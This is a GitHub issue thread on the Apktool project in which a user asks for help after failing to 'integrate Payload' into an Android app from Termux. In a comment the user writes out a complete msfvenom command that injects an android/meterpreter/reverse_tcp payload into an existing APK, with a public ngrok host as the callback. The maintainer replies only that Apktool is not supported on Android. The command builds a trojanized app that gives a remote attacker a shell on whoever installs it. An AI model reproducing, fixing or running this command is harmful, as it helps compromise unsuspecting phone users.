### ISSUE TITLE
[BUG]Hello, I am suffering from the problem of not being able to integrate Payload with the Android application. I searched on several sites and did not find the solution, Knowing that I installed the version and it did not work every time I was asked to install 2.9.2 

### ISSUE THREAD

**Issue by ebrahimalamry17** [iBotPeaches/Apktool#3582]
### Information
1. **Apktool Version (`apktool -version`)** -2.9.2
2. **Operating System (Mac, Linux, Windows)** -Linux
3. **APK From? (Playstore, ROM, Other)** -termux
4. **Java Version (`java --version`)** -openjdk 17.0.10 2024-01-16
OpenJDK Runtime Environment (build 17.0.10+7-Debian-1)
OpenJDK 64-Bit Server VM (build 17.0.10+7-Debian-1, mixed mode, sharing)

### Stacktrace/Logcat

```
Include stacktrace here
```

### Steps to Reproduce
1. `apktool `

### Frameworks
If this APK is from an OEM ROM (Samsung, HTC, LG). Please attach framework files samsung 
(`.apks` that live in `/system/framework` or `/system/priv-app`)

### APK
If this APK can be freely shared, please upload/attach a link to it.

### Questions to ask before submi
![Screenshot_٢٠٢٤٠٤٢٥-٠٠٤٨٢٥_Termux](https://github.com/iBotPeaches/Apktool/assets/168036827/fd81dec9-9029-4d48-9ebe-3bf169a0f7b1)

**Comment by ebrahimalamry17** [comment]
I also tried using it with a tool msfvenom  And it didn't work... 
msfvenom -x /speed.apk -p android/meterpreter/reverse_tcp LHOST=1.tcp.eu.ngrok.io LPORT=15885 -o /sdcard.apk

**Comment by iBotPeaches** [comment]
Apktool is not officially supported on Android devices.
